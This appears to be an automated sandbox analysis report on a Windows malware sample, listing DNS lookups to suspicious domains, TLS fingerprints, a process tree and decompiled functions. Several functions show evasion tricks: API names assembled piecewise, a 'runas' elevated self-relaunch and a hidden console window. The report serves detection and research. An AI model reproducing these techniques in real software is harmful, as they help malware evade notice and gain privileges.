Aug 3, 2021 23:38:06.085091114 CEST	8.8.8.8	192.168.2.3	0x9251	No error (0)	a.goatgame.co	172.67.146.70	A (IP address)	IN (0x0001)
Aug 3, 2021 23:38:06.085091114 CEST	8.8.8.8	192.168.2.3	0x9251	No error (0)	a.goatgame.co	104.21.79.144	A (IP address)	IN (0x0001)
Aug 3, 2021 23:38:14.388151884 CEST	8.8.8.8	192.168.2.3	0xc59	No error (0)	google.vrthcobj.com	34.97.69.225	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 3, 2021 23:38:06.144718885 CEST	172.67.146.70	443	192.168.2.3	49708	CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Sun Jul 18 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020	Mon Jul 18 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Aug 3, 2021 23:38:06.144718885 CEST	172.67.146.70	443	192.168.2.3	49708	CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US	CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE	Mon Jan 27 13:48:08 CET 2020	Wed Jan 01 00:59:59 CET 2025		ce5f3254611a8c095a3d821d44539877

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: TMB1fxNaqR.exe PID: 1740 Parent PID: 5572

General

Start time:	23:38:02
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\TMB1fxNaqR.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\TMB1fxNaqR.exe'
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	A92922A71A9BF58CC2D95A6039C9A1B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 2332 Parent PID: 1740

General

Start time:	23:38:03
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: TMB1fxNaqR.exe PID: 4704 Parent PID: 1740

General

Start time:	23:38:03
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\TMB1fxNaqR.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\TMB1fxNaqR.exe' -a
Imagebase:	0x400000
File size:	57344 bytes
MD5 hash:	A92922A71A9BF58CC2D95A6039C9A1B6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: conhost.exe PID: 5376 Parent PID: 4704

General

Start time:	23:38:04
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: TMB1fxNaqR.exe PID: 1740 Parent PID: 5572 TMB1fxNaqR.exeCOMMON

Executed Functions

Function 004018A0, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004018A0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _SHELLEXECUTEINFOW _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				char _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				char _v100;
				intOrPtr _v104;
				char _v108;
				struct HINSTANCE__* _t29;
				_Unknown_base(*)()* _t30;
				int _t36;
				char* _t47;

				_v76 = 0x6c656853;
				_v72 = 0x6578456c;
				_v68 = 0x65747563;
				_v64 = 0x577845;
				_v108 = 0x4c454853;
				_v104 = 0x32334c;
				_t29 = LoadLibraryA( &_v108);
				_t7 =  &_v76; // 0x6c656853
				_t30 = GetProcAddress(_t29, _t7);
				if(_t30 != 0) {
					_v88 = 0x70006f;
					_v84 = 0x6e0065;
					_v80 = 0;
					_v100 = 0x750072;
					_v96 = 0x61006e;
					_v92 = 0x73;
					_t47 =  &_v100;
					if(_a12 == 0) {
						_t47 =  &_v88;
					}
					memset( &(_v60.fMask), 0, 0xe << 2);
					_v60.lpParameters = _a8;
					_v60.cbSize = 0x3c;
					_v60.lpVerb = _t47;
					_v60.fMask = 0x440;
					_v60.nShow = 1;
					_v60.lpFile = _a4;
					_t36 = ShellExecuteExW( &_v60); // executed
					return _t36;
				} else {
					return _t30;
				}
			}

0x004018a7
0x004018b0
0x004018b8
0x004018c0
0x004018c8
0x004018d0
0x004018d8
0x004018de
0x004018e4
0x004018ee
0x004018fc
0x00401904
0x0040190c
0x00401914
0x0040191c
0x00401924
0x0040192c
0x00401930
0x00401932
0x00401932
0x00401941
0x0040194b
0x00401954
0x0040195c
0x00401960
0x00401968
0x00401970
0x00401974
0x0040197b
0x004018f3
0x004018f3
0x004018f3

APIs

LoadLibraryA.KERNELBASE(?,?,00000000), ref: 004018D8
GetProcAddress.KERNEL32(00000000,Shel), ref: 004018E4
ShellExecuteExW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00401974

Strings

lExe, xrefs: 004018B0
n, xrefs: 0040191C
SHEL, xrefs: 004018C8
s, xrefs: 00401924
ExW, xrefs: 004018C0
cute, xrefs: 004018B8
<, xrefs: 00401954
L32, xrefs: 004018D0
r, xrefs: 00401914
Shel, xrefs: 004018DE, 004018E2
o, xrefs: 004018FC

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressExecuteLibraryLoadProcShell
String ID: <$ExW$L32$SHEL$Shel$cute$lExe$n$o$r$s
API String ID: 3429701994-1301878048
Opcode ID: b9f5454fef49bf6b9280b294314e2fdfefa0662a765cc02f7ae7c57e7b43cc19
Instruction ID: 5fbf3ab5474b3f5d763234864d4cabc52bd483d31f91fe065027036cbba7c068
Opcode Fuzzy Hash: b9f5454fef49bf6b9280b294314e2fdfefa0662a765cc02f7ae7c57e7b43cc19
Instruction Fuzzy Hash: 232110B55083819FE310CF15D44875BBBF5BBC8308F408A2DFA98A6220D7B9D6488F97

Uniqueness

Uniqueness Score: -1.00%

Function 0040268E, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 73%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				unsigned int _t8;
				intOrPtr _t18;
				signed int _t25;
				intOrPtr _t41;

				_t37 = __edi;
				_push(0xffffffff);
				_push(0x408150);
				_push(E00403E48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t41;
				_push(__edi);
				_v28 = _t41 - 0x10;
				_t8 = GetVersion();
				 *0x40cf70 = 0;
				_t25 = _t8 & 0x000000ff;
				 *0x40cf6c = _t25;
				 *0x40cf68 = _t25 << 8;
				 *0x40cf64 = _t8 >> 0x10;
				if(E00403DE2(_t25 << 8, 1) == 0) {
					E004027A3(0x1c);
				}
				if(E0040325C() == 0) {
					E004027A3(0x10);
				}
				_v8 = _v8 & 0x00000000;
				E00403AB1(); // executed
				 *0x40d658 = GetCommandLineA();
				 *0x40cf54 = E0040397F();
				E00403732();
				E00403679();
				E004033E1();
				_t18 =  *0x40cf80; // 0x5d1150
				 *0x40cf84 = _t18;
				_push(_t18);
				_push( *0x40cf78);
				_v32 = E00402220( *0x40cf74);
				E0040340E(_t19);
				_v36 =  *((intOrPtr*)( *_v24));
				return E00403501(_t37, _v8,  *((intOrPtr*)( *_v24)), _v24);
			}

0x0040268e
0x00402691
0x00402693
0x00402698
0x004026a3
0x004026a4
0x004026b0
0x004026b1
0x004026b4
0x004026be
0x004026c6
0x004026cc
0x004026d7
0x004026e0
0x004026ef
0x004026f3
0x004026f8
0x00402700
0x00402704
0x00402709
0x0040270a
0x0040270e
0x00402719
0x00402723
0x00402728
0x0040272d
0x00402732
0x00402737
0x0040273c
0x00402741
0x00402742
0x00402756
0x0040275a
0x00402766
0x00402772

APIs

GetVersion.KERNEL32 ref: 004026B4

Part of subcall function 00403DE2: HeapCreate.KERNELBASE(00000000,00001000,00000000,004026EC,00000001), ref: 00403DF3
Part of subcall function 00403DE2: HeapDestroy.KERNEL32 ref: 00403E32

GetCommandLineA.KERNEL32 ref: 00402713

Part of subcall function 004027A3: ExitProcess.KERNEL32 ref: 004027C0

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$CommandCreateDestroyExitLineProcessVersion
String ID:
API String ID: 1387771204-0
Opcode ID: 9819f3efd5e0bc67373acbe65d0863efbab77b1ab3de868039648ff62432aa72
Instruction ID: dbcde8c0d74add2fd977bb7821ae56491b3df763b9f180bb5072669b1ad6f373
Opcode Fuzzy Hash: 9819f3efd5e0bc67373acbe65d0863efbab77b1ab3de868039648ff62432aa72
Instruction Fuzzy Hash: F5216FB0940602EFE704BF76DE86B693FA9EB48715F10063EF501B62E2DA7D45408A5E

Uniqueness

Uniqueness Score: -1.00%

Function 004053C0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004053C0() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E0040537A); // executed
				 *0x40d120 = _t1;
				return _t1;
			}

0x004053c5
0x004053cb
0x004053d0

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_0000537A), ref: 004053C5

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: d81cd8cca98b95c7f026b22de7b7070796040f23e3485d3daf8b8d7cbf726c2c
Instruction ID: b0c1b621581ff01479d1738a7a82d0496a47dd87dfb0e1d8ef94e62feaa6fe29
Opcode Fuzzy Hash: d81cd8cca98b95c7f026b22de7b7070796040f23e3485d3daf8b8d7cbf726c2c
Instruction Fuzzy Hash: 37A001B4981684CAD6105FA0AA09A1A7A60A648642711427AA881A52A4DFB500189E2D

Uniqueness

Uniqueness Score: -1.00%

Function 004053D2, Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNELBASE ref: 004053D7

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 72b01a4f35158a996b8558862cf0ed699db58f2c1cf628b77ee05e8ed659372c
Instruction ID: d332188bd55615930e72a30cb54faed210c9574330ed5165572dacab72e8a7a4
Opcode Fuzzy Hash: 72b01a4f35158a996b8558862cf0ed699db58f2c1cf628b77ee05e8ed659372c
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00401ED0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 32
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401ED0() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				_Unknown_base(*)()* _t11;
				intOrPtr* _t12;
				void* _t14;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t18;

				_t16 =  *0x40cf50; // 0x77400000
				_v32 = 0x776f6853;
				_v28 = 0x646e6957;
				_v24 = 0x776f;
				_t11 = GetProcAddress(_t16,  &_v32);
				_t4 =  &_v20; // 0x646e6957
				_t18 = _t11;
				_v20 = 0x43746547;
				_v16 = 0x6f736e6f;
				_v12 = 0x6957656c;
				_v8 = 0x776f646e;
				_v4 = 0;
				_t12 = E00401000(_t4);
				if(_t12 != 0) {
					_t14 =  *_t12(); // executed
					if(_t14 != 0) {
						 *_t18(_t14, 0); // executed
					}
				}
				return 0;
			}

0x00401ed3
0x00401ee0
0x00401ee8
0x00401ef0
0x00401ef8
0x00401efe
0x00401f02
0x00401f05
0x00401f0d
0x00401f15
0x00401f1d
0x00401f25
0x00401f2d
0x00401f37
0x00401f39
0x00401f3d
0x00401f42
0x00401f42
0x00401f3d
0x00401f4a

APIs

GetProcAddress.KERNEL32 ref: 00401EF8

Part of subcall function 00401000: LoadLibraryA.KERNEL32(74AF0000,?,?,?,?,?,?,?,?,?,00401F7B), ref: 00401029
Part of subcall function 00401000: GetProcAddress.KERNEL32(74AF0000,?), ref: 0040103A

GetConsoleWindow.KERNELBASE ref: 00401F39

Strings

Show, xrefs: 00401EE0
ndow, xrefs: 00401F1D
onso, xrefs: 00401F0D
leWi, xrefs: 00401F15
WindShow, xrefs: 00401EFE, 00401F04

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ConsoleLibraryLoadWindow
String ID: Show$WindShow$leWi$ndow$onso
API String ID: 3244098602-3304525419
Opcode ID: eec96b3e00037f079adfc115217fffcd69f587b1fa2542faf91af3998528be0d
Instruction ID: 7c2929fdc0435c11f451e5eae0e96c8988408f82577c475e854d6584631a204a
Opcode Fuzzy Hash: eec96b3e00037f079adfc115217fffcd69f587b1fa2542faf91af3998528be0d
Instruction Fuzzy Hash: F3F0FFB040C3439BE710DF55994575BBBE4BF84748F00491CF498A6298E734D608CFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00403AB1, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00403AB1() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E004028B0(0x480);
				if(_t89 == 0) {
					E0040277E(0x1b);
				}
				 *0x40d540 = _t89;
				 *0x40d640 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x40d540; // 0x5d0630
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x40d540; // 0x5d0630
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87); // executed
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x40d640);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x40d640 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x40d540[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x40d544;
					while(1) {
						_t69 = E004028B0(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x40d640 =  *0x40d640 + 0x20;
						__eflags =  *0x40d640;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x40d640 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x40d640; // 0x20
					goto L18;
				}
			}

0x00403ac4
0x00403ac9
0x00403acd
0x00403ad2
0x00403ad3
0x00403ad9
0x00403ae3
0x00403ae3
0x00403ae9
0x00403aed
0x00403af1
0x00403af4
0x00403af8
0x00403afc
0x00403b01
0x00403b04
0x00403b04
0x00403b0f
0x00403b15
0x00403b1a
0x00403bf1
0x00403bf1
0x00403bf1
0x00403bf3
0x00403bf3
0x00403bf9
0x00403bfc
0x00403c00
0x00403c03
0x00403c52
0x00403c52
0x00403c52
0x00000000
0x00403c52
0x00403c05
0x00403c07
0x00403c0b
0x00403c17
0x00403c19
0x00403c19
0x00403c0d
0x00403c0f
0x00403c0f
0x00403c23
0x00403c25
0x00403c28
0x00403c41
0x00403c41
0x00403c2a
0x00403c2b
0x00403c31
0x00403c33
0x00000000
0x00000000
0x00403c35
0x00403c3a
0x00403c3c
0x00403c3f
0x00403c47
0x00403c4a
0x00403c4c
0x00403c4c
0x00000000
0x00403c4a
0x00000000
0x00403c3f
0x00403c56
0x00403c56
0x00403c57
0x00403c57
0x00403c6c
0x00403c6c
0x00403b20
0x00403b23
0x00403b25
0x00000000
0x00000000
0x00403b2b
0x00403b2d
0x00403b33
0x00403b3b
0x00403b3d
0x00403b3f
0x00403b3f
0x00403b41
0x00403b47
0x00403b9f
0x00403b9f
0x00403ba1
0x00403ba3
0x00000000
0x00000000
0x00000000
0x00000000
0x00403ba5
0x00403ba5
0x00403ba8
0x00403baa
0x00403bad
0x00000000
0x00000000
0x00403baf
0x00403bb1
0x00403bb3
0x00000000
0x00000000
0x00403bb5
0x00403bb7
0x00403bc4
0x00403bcb
0x00403bcb
0x00403bd8
0x00403be0
0x00403be4
0x00000000
0x00403be4
0x00403bba
0x00403bc0
0x00403bc2
0x00000000
0x00000000
0x00000000
0x00403be7
0x00403be7
0x00403beb
0x00403bec
0x00403bed
0x00403bed
0x00000000
0x00403b49
0x00403b49
0x00403b4e
0x00403b53
0x00403b58
0x00403b5b
0x00000000
0x00000000
0x00403b5d
0x00403b5d
0x00403b64
0x00403b66
0x00403b66
0x00403b6c
0x00403b6c
0x00403b6e
0x00000000
0x00000000
0x00403b70
0x00403b74
0x00403b77
0x00403b7b
0x00403b81
0x00403b84
0x00403b84
0x00403b8c
0x00403b8f
0x00403b95
0x00000000
0x00000000
0x00000000
0x00403b97
0x00403b99
0x00000000
0x00403b99

APIs

GetStartupInfoA.KERNEL32(?), ref: 00403B0F
GetFileType.KERNEL32(00000480), ref: 00403BBA
GetStdHandle.KERNEL32(-000000F6), ref: 00403C1D
GetFileType.KERNELBASE(00000000), ref: 00403C2B
SetHandleCount.KERNEL32 ref: 00403C62

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: f96ab5c3b3ce5c80a1d7be2a8d6d1901d1895f06aae12e873bbcdfc6ba064abd
Instruction ID: c249e2747dbcc942616e7c25e8cb94bea761bdfb293cc7134fb40ed31e53966b
Opcode Fuzzy Hash: f96ab5c3b3ce5c80a1d7be2a8d6d1901d1895f06aae12e873bbcdfc6ba064abd
Instruction Fuzzy Hash: 375138329042118FD7208F68C9447267FE8AB4132EF25463ED596FB2E2D738EA49C709

Uniqueness

Uniqueness Score: -1.00%

Function 00403430, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00403430(void* __esi, char _a4, intOrPtr _a8, char _a12) {
				intOrPtr _t9;
				intOrPtr* _t11;
				char _t16;
				intOrPtr _t22;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;
				void* _t32;

				_t24 = __esi;
				E004034D5();
				_t23 = 1;
				_t27 =  *0x40cfa0 - _t23; // 0x1
				if(_t27 == 0) {
					_t1 =  &_a4; // 0x40275f
					TerminateProcess(GetCurrentProcess(),  *_t1);
				}
				_t16 = _a12;
				 *0x40cf9c = _t23;
				 *0x40cf98 = _t16;
				if(_a8 == 0) {
					_t9 =  *0x40d650; // 0x5d04c8
					if(_t9 != 0) {
						_t22 =  *0x40d64c; // 0x5d04cc
						_push(_t24);
						_t4 = _t22 - 4; // 0x5d04c8
						_t25 = _t4;
						if(_t25 >= _t9) {
							do {
								_t11 =  *_t25;
								if(_t11 != 0) {
									 *_t11();
								}
								_t25 = _t25 - 4;
								_t32 = _t25 -  *0x40d650; // 0x5d04c8
							} while (_t32 >= 0);
						}
					}
					E004034E7(0x40a020, 0x40a024);
				}
				E004034E7(0x40a028, 0x40a030);
				if(_t16 == 0) {
					_t5 =  &_a4; // 0x40275f
					 *0x40cfa0 = _t23; // executed
					ExitProcess( *_t5);
				}
				return E004034DE();
			}

0x00403430
0x00403431
0x00403438
0x00403439
0x0040343f
0x00403441
0x0040344c
0x0040344c
0x00403458
0x0040345c
0x00403462
0x00403468
0x0040346a
0x00403471
0x00403473
0x00403479
0x0040347a
0x0040347a
0x0040347f
0x00403481
0x00403481
0x00403485
0x00403487
0x00403487
0x00403489
0x0040348c
0x0040348c
0x00403481
0x00403494
0x0040349f
0x004034a5
0x004034b0
0x004034ba
0x004034c3
0x004034c7
0x004034cd
0x004034cd
0x004034c2

APIs

GetCurrentProcess.KERNEL32(_'@,?,0040341B,00000000,00000000,00000000,0040275F,00000000), ref: 00403445
TerminateProcess.KERNEL32(00000000,?,0040341B,00000000,00000000,00000000,0040275F,00000000), ref: 0040344C
ExitProcess.KERNEL32 ref: 004034CD

Strings

_'@, xrefs: 004034C3, 00403441

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID: _'@
API String ID: 1703294689-884491114
Opcode ID: 5272f572db72a57918013aef6ca7163dfb087589fb800bbe82601931170dca4f
Instruction ID: 643cadbd7388625a902ca90f5e3a50e55bb245335862398b1b576abc5476d119
Opcode Fuzzy Hash: 5272f572db72a57918013aef6ca7163dfb087589fb800bbe82601931170dca4f
Instruction Fuzzy Hash: 3B01C431A043019FDA12AF65FE85A1ABFA9AB40326B10853FF4457B1D0CB3D9985CB1E

Uniqueness

Uniqueness Score: -1.00%

Function 00403DE2, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403DE2(void* __ecx, intOrPtr _a4) {
				void* _t6;
				intOrPtr _t8;
				void* _t9;
				void* _t10;
				void* _t12;

				_t12 = __ecx;
				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				_t15 = _t6;
				 *0x40d524 = _t6;
				if(_t6 == 0) {
					L7:
					return 0;
				} else {
					_t8 = E00403C9A(_t12, _t15);
					 *0x40d528 = _t8;
					if(_t8 != 3) {
						__eflags = _t8 - 2;
						if(_t8 != 2) {
							goto L8;
						} else {
							_t10 = E00404BF3();
							goto L5;
						}
					} else {
						_t10 = E004040AC(0x3f8);
						L5:
						if(_t10 != 0) {
							L8:
							_t9 = 1;
							return _t9;
						} else {
							HeapDestroy( *0x40d524);
							goto L7;
						}
					}
				}
			}

0x00403de2
0x00403df3
0x00403df9
0x00403dfb
0x00403e00
0x00403e38
0x00403e3a
0x00403e02
0x00403e02
0x00403e0a
0x00403e0f
0x00403e1e
0x00403e21
0x00000000
0x00403e23
0x00403e23
0x00000000
0x00403e23
